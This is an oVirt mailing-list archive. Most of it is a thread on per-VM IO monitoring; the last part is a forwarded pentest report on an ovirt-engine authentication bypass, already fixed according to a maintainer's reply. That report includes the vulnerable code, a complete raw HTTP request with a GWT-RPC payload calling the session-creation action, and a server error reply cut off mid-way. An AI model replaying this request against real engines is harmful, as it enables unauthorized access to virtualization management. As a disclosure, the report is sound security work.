[ovirt-users] Re: IO per VM monitoring

2024-02-13 Thread Patrick Dubois via Users
I have different collection schedules depending on the importance of the 
data I'm collecting.  You can adjust as you need accordingly.


For your IO issues you can easily simply poll your machine's IO load 
statistics from the 5/10/15 minute averages.  That will not give you 
precise intervals but certainly will tell you if something is going wrong.


To be honest,  Zabbix is flexible enough to get you what you need even 
if you're not monitoring the metric directly.   Anything you can do to 
raise system visibility is good stuff!


Enjoy!

On 2024-02-13 14:32, Jorge Visentini wrote:

Hi.

I also use Zabbix here. Its problem is that it collects metrics in 
real time, this is not its function.
There are other alternatives like Elasticsearch + metricbeat, but from 
what I've tested, it's very heavy and uses a lot of disk space lol.


I never used Prometheus, I found it interesting. I'll do some tests.

@Patrick Dubois  How often do you collect 
information with Zabbix? Every 1 minute?
Because for example... for the information to be used correctly for 
analysis, we have to have an IO load of at least 1 continuous minute 
so that Zabbix can collect the correct information.


Cheers!

On Tue, Feb 13, 2024 at 13:44, Patrick Dubois via Users wrote:


For detailed monitoring I use Zabbix.  This way I get detailed metrics
on my hypervisors, VMs as well as my network storage.

If a machine starts generating large IO I get alerts highlighting the
responsible machine as well as the impacted services.  For example, you
might get high IO on a VM but also the correlated high latency on
systems sharing the storage.

Sometimes users will report the high latency, masking the real
problem so it's nice to have a holistic view of the entire environment.

Patrick.Dubois

On 2024-02-13 11:19, marek wrote:
> hi,
>
> i have prometheus based ovirt hosts monitoring (node_exporter,
> smartcl_exporter, ipmi_exporter)
>
> https://prometheus-community.github.io/ansible/branch/main/ and alerts
> from https://samber.github.io/awesome-prometheus-alerts/
>
> after i started this monitoring  i found that one VM is overloading
> local storage (so i must check IO limiting documentation as a homework
> :) )
>
> but my question is
>
> how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)
>
> some qemu/libvirt exporter? some custom text file + node_exporter?
>
> thanks for tips
>
> Marek
> ___
> Users mailing list -- users@ovirt.org
> To unsubscribe send an email to users-le...@ovirt.org
> Privacy Statement: https://www.ovirt.org/privacy-policy.html
> oVirt Code of Conduct:
> https://www.ovirt.org/community/about/community-guidelines/
> List Archives:
>

https://lists.ovirt.org/archives/list/users@ovirt.org/message/6HVHFX464QJPJTVXUFCF7RAGAUFD33HE/



--
Att,
Jorge Visentini
+55 55 98432-9868


[ovirt-users] Re: IO per VM monitoring

2024-02-13 Thread Jorge Visentini
Hi.

I also use Zabbix here. Its problem is that it collects metrics in real
time, this is not its function.
There are other alternatives like Elasticsearch + metricbeat, but from what
I've tested, it's very heavy and uses a lot of disk space lol.

I never used Prometheus, I found it interesting. I'll do some tests.

@Patrick Dubois  How often do you collect information with
Zabbix? Every 1 minute?
Because for example... for the information to be used correctly for
analysis, we have to have an IO load of at least 1 continuous minute so
that Zabbix can collect the correct information.

Cheers!

On Tue, Feb 13, 2024 at 13:44, Patrick Dubois via Users <users@ovirt.org> wrote:

> For detailed monitoring I use Zabbix.  This way I get detailed metrics
> on my hypervisors, VMs as well as my network storage.
>
> If a machine starts generating large IO I get alerts highlighting the
> responsible machine as well as the impacted services.  For example,  you
> might get high IO on a VM but also the correlated high latency on
> systems sharing the storage.
>
> Sometimes users will report the high latency, masking the real
> problem so it's nice to have a holistic view of the entire environment.
>
> Patrick.Dubois
>
> On 2024-02-13 11:19, marek wrote:
> > hi,
> >
> > i have prometheus based ovirt hosts monitoring (node_exporter,
> > smartcl_exporter, ipmi_exporter)
> >
> > https://prometheus-community.github.io/ansible/branch/main/ and alerts
> > from https://samber.github.io/awesome-prometheus-alerts/
> >
> > after i started this monitoring  i found that one VM is overloading
> > local storage (so i must check IO limiting documentation as a homework
> > :) )
> >
> > but my question is
> >
> > how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)
> >
> > some qemu/libvirt exporter? some custom text file + node_exporter?
> >
> > thanks for tips
> >
> > Marek


-- 
Att,
Jorge Visentini
+55 55 98432-9868


[ovirt-users] Re: IO per VM monitoring

2024-02-13 Thread Patrick Dubois via Users
For detailed monitoring I use Zabbix.  This way I get detailed metrics 
on my hypervisors, VMs as well as my network storage.


If a machine starts generating large IO I get alerts highlighting the 
responsible machine as well as the impacted services.  For example,  you 
might get high IO on a VM but also the correlated high latency on 
systems sharing the storage.


Sometimes users will report the high latency, masking the real 
problem so it's nice to have a holistic view of the entire environment.


Patrick.Dubois

On 2024-02-13 11:19, marek wrote:

hi,

i have prometheus based ovirt hosts monitoring (node_exporter, 
smartcl_exporter, ipmi_exporter)


https://prometheus-community.github.io/ansible/branch/main/ and alerts 
from https://samber.github.io/awesome-prometheus-alerts/


after i started this monitoring  i found that one VM is overloading 
local storage (so i must check IO limiting documentation as a homework 
:) )


but my question is

how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)

some qemu/libvirt exporter? some custom text file + node_exporter?

thanks for tips

Marek


[ovirt-users] IO per VM monitoring

2024-02-13 Thread marek

hi,

i have prometheus based ovirt hosts monitoring (node_exporter, 
smartcl_exporter, ipmi_exporter)


https://prometheus-community.github.io/ansible/branch/main/ and alerts 
from https://samber.github.io/awesome-prometheus-alerts/


after i started this monitoring  i found that one VM is overloading 
local storage (so i must check IO limiting documentation as a homework :) )


but my question is

how do you monitor IO traffic per VM? (IOPS, read/write traffic,..)

some qemu/libvirt exporter? some custom text file + node_exporter?

thanks for tips

Marek


[ovirt-users] Re: Internal pentest result : Ovirt-engine authentication bypass

2024-02-13 Thread Jirka Simon

Hi  Sandro,

Thank you a lot.

Jirka


On 2/12/24 13:20, Sandro Bonazzola wrote:

Hi, thanks for reporting.
An advisory has been published: 
https://github.com/oVirt/ovirt-engine/security/advisories/GHSA-5p2q-85hp-rvxg 

and the fix has been released in ovirt-engine-4.5.6: 
https://github.com/oVirt/ovirt-engine/releases/tag/ovirt-engine-4.5.6

Builds are on their way to the mirrors.


On Mon, Jan 15, 2024 at 10:09, Jirka Simon wrote:


Hello ovirt community.

We had an internal pentest here and one finding is

*Ovirt-engine authentication bypass.*

Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an authentication bypass. It is
possible to directly call the CreateUserSessionCommand using runAction exposed by
/ovirt-engine/webadmin/GenericApiGWTService.

*This action explicitly enables everyone to call it:*
```
@Override
protected boolean isUserAuthorizedToRunAction() {
    return true;
}
```

The behavior of this call differs based on the ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:

```
boolean externalSsoEnabled =
    EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
    dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) :
    dbUserDao.getByExternalId(authzName, params.getPrincipalId());
```

If this option is enabled, usernames are used to locate users. If it's disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.

If the specified user exists, a session is returned for the user. If the specified user doesn't exist,
the user is created in the system. However, the user doesn't get assigned any group membership
or rights, therefore the session creation fails because of the missing Login right.

The attempt to modify the users table can be seen in the SQL error message when attempting to
use a null value for the username (as the endpoint uses GWT, the payload is mostly unreadable):

Final Report: Results of penetration testing (internal, external, Wi-Fi)
21 December 2023

```
POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1
Host: ovirtm.xxx.xxx.cz
Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45;
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D
Ovirt-Xsrf-Token: 4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869

7|0|23|https://ovirtm.xxx.xxx.cz/ovirt-engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWTService|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.common.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameters/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|admin|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProcedure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentities.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|201|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-4|22|0|1|0|1|23|2|0|0|0|

HTTP/1.1 200 OK
Date: Fri, 15 Dec 2023 09:42:35 GMT
Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k mod_auth_gssapi/1.6.1
Expires: Thu, 14 Dec 2023 09:42:35 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly; Max-Age=2147483647; Expires=Wed, 02-Jan-2092 12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK
Pragma: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
Content-Disposition: attachment
X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794
Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5
Connection: close

//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.ActionReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineError/2640515959","ERROR: null value in column \"username\" violates
not-null constraint\n Detail:
Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6,
firstName, lastName, internal-authz, null,
, email, , f, principalId, 2023-12-14 17:51:04.757747+01,
2023-12-15